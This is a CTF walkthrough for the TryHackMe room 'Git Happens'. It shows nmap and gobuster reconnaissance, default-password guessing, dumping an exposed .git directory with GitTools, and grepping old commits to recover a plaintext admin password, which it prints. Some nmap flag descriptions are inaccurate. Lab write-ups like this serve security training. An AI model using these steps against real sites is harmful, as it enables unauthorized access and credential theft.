In this CTF (Capture the Flag) walkthrough, we will be working through the TryHackMe challenge, Git Happens!
If you don’t want any spoilers, I’d recommend trying out this free hacking challenge first before reading any further. You can also watch the video where I’ll walk you through the whole challenge:
We’ll be hacking into a git repository and extracting the username:password combination for the administrative portal.
We’ll make use of gittools to extract the early git commits and comments. The final step is to use some clever command line text parsing to quickly narrow things down to our password and username.
First let’s export our IPs:
export myIP=10.6.2.23 export targetIP=10.10.122.132
Now we’ll go ahead and connect to the TryHackMe VPN from our Kali VM (Virtual Machine). In the walkthrough video, I am running Manjaro Linux with a virtual Kali machine running on Gnome Boxes.
sudo openvpn kalisurfer.ovpn
Now that we are properly connected to our target machine let’s start the first phase of our hack.
ENUMERATION
Our standard Nmap scan has a few extra flags today to extend the functionality.
sudo nmap $targetIP -Pn -p- -sC -A -O -oN nmap-scan-results.txt
-Pn= stealth scan, skip host discovery-p-= scan all ports- -sC = run standard scripts
-A= Enable OS detection, version detection, script scanning, and traceroute-O= Detect operating system-oN= output in normal format [filename]
Output:
GNU nano 7.0 nmap-scan.txt
# Nmap 7.93 scan initiated Tue Dec 13 10:51:00 2022 as: nmap -Pn
-sC -p- -O -oN nmap-scan.txt 10.112.132
Nmap scan report for 10.112.132 (10.112.0.132)
Host is up (0.0012s latency).
All 65535 scanned ports on 10.112.132 (10.112.0.132) are in ignor
ed states.
Not shown: 64535 filtered tcp ports (net-unreach), 1000 filtered
tcp ports (no-response)
Too many fingerprints match this host to give specific OS details
OS detection performed. Please report any incorrect results at ht
tps://nmap.org/submit/ .
# Nmap done at Tue Dec 13 10:54:32 2022 -- 1 IP address (1 host u
p) scanned in 212.47 secondsWALKING THE WEBSITE
We discover a login page by loading up our browser to our $targetIP. We try a few guesses of standard administrator user:password combinations without any luck.
admin:admin,admin:password,admin:password123
DIRECTORY SNIFFING WITH GOBUSTER
Next, we will sniff out directories with GoBuster. With the following command, we discover a hidden page at $targetIP/.git/
gobuster dir -w ~/hacking-tools/SecLists/Discovery/Web-Content/dirsearch.txt --url http://10.10.122.132
The hidden page looks like an index of the Git repo. We can download the files individually, but with Gittools we can extract even more metadata from the Git repo.
USING GITTOOLS TO EXTRACT REPO METADATA
First, we’ll download Gittools from the official Github repo.
After navigating into the new directory from Gitttools, we run the gitdumper.sh file with our target address and download location.
Use the dumper:
./gitdumper.sh http://10.10.122.132/.git/ ~/THM/Git-Happens
Now we can view more details about the Git commits with the command ‘git log’.
COMMAND LINE TEXT PARSING
This next series of commands will help us to quickly narrow things down to our username:password combination.
git log | grep commit
This command displays the list of commits and hashes
git log | grep commit | cut -d " " -f2
Now we cut out just the list of hashes. The cut -d " " -f2 part of the command cuts the list into a dictionary with an open space as the delimiter.
The -f2 displays only field 2. If this was an Excel spreadsheet, it is as if we are only viewing column 2.
Next, we’ll send that output as a new input to the command <hash> git show with xargs.
-git log | grep commit | cut -d " " -f2 | xargs git show
Let’s extend the command a bit further to save it to a .txt file.
git log | grep commit | cut -d " " -f2 | xargs git show > gitcommits.txt
We can look through this .txt file manually, but it is faster to use “grep password” to find text lines with the word “password”.
cat gitcommits.txt | grep password
And to find the username:
Now we can find the password in plaintext with a simple glance over the output.
found it!
admin:Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!Thanks for watching! Catch you next time.
Feel free to check out our other TryHackMe walkthrough:
👉 Recommended: Web Hacking 101: Solving the TryHackMe Pickle Rick “Capture The Flag” Challenge
Resources
The two tracks used as background music are used under creative commons licenses and were downloaded at https://freemusicarchive.org
- Mr. Frisby’s Beat Pocket – Cool Fountains
- Damiano Baldoni – Gothic trip with thunderhorse
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.